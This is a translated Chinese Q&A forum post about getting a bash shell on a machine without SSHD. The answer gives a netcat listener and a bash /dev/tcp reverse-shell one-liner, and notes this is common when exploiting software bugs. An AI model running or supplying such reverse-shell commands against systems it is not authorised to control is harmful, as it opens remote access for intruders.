我有一台没有 SSHD 的机器,我想从远程机器(我可以完全控制)在这台机器上打开 bash shell。
由于我的有限机器上有 SSH,因此我配置了反向代理:
$ ssh -R 19999:localhost:22 remoteuser@remotemachine
现在,我在端口 19999 上建立了从“完全控制”机器到“受限”机器的连接。我将如何使用此设置打开外壳?
您可以将输入从某个端口直接传送到bash
。这是滥用软件中的各种错误时的常见做法。例如,在具有完全访问权限的计算机上运行:
nc -lvp 9999
并且在有限的机器上
/bin/bash -i >& /dev/tcp/192.168.122.1/9999 0>&1
哪里的192.168.122.1
是全控机的IP。
这将为您提供第一台机器中第二台机器的外壳。但请注意,连接未加密。如果您想要加密,则需要添加 TCP 转发步骤(与上面的建议类似)。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)